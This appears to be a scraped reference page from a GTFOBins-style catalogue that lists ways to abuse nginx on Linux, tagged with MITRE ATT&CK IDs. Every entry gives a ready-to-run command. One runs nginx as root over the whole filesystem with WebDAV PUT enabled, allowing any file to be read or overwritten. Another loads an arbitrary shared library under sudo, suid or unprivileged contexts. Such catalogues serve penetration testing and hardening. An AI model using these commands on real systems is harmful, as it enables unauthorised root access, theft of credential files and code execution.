download File DownloadPrivilege Escalation Linux cat >/path/to/temp-file <<EOF user root; http { server { listen 80; root /; autoindex on; dav_methods PUT; } } events {} EOF nginx -c /path/to/temp-file copy Contextsudo Nativedownload MITRET1105 Refsgtfobins.github.io/gtfobins/nginx/
library-load Library LoadPrivilege Escalation Linux Alternatively, the `ssl_engine` directive can be used. cat >/path/to/temp-file <<EOF load_module /path/to/lib.so; EOF nginx -t -c /path/to/temp-file copy Contextsudo Nativelibrary-load MITRET1574 Refsgtfobins.github.io/gtfobins/nginx/
library-load Library LoadPrivilege Escalation Linux Alternatively, the `ssl_engine` directive can be used. cat >/path/to/temp-file <<EOF load_module /path/to/lib.so; EOF nginx -t -c /path/to/temp-file copy Contextsuid Nativelibrary-load MITRET1574 Refsgtfobins.github.io/gtfobins/nginx/
library-load Library Load Linux Alternatively, the `ssl_engine` directive can be used. cat >/path/to/temp-file <<EOF load_module /path/to/lib.so; EOF nginx -t -c /path/to/temp-file copy Contextunprivileged Nativelibrary-load MITRET1574 Refsgtfobins.github.io/gtfobins/nginx/
upload File UploadPrivilege Escalation Linux cat >/path/to/temp-file <<EOF user root; http { server { listen 80; root /; autoindex on; dav_methods PUT; } } events {} EOF nginx -c /path/to/temp-file copy Contextsudo Nativeupload MITRET1041 Refsgtfobins.github.io/gtfobins/nginx/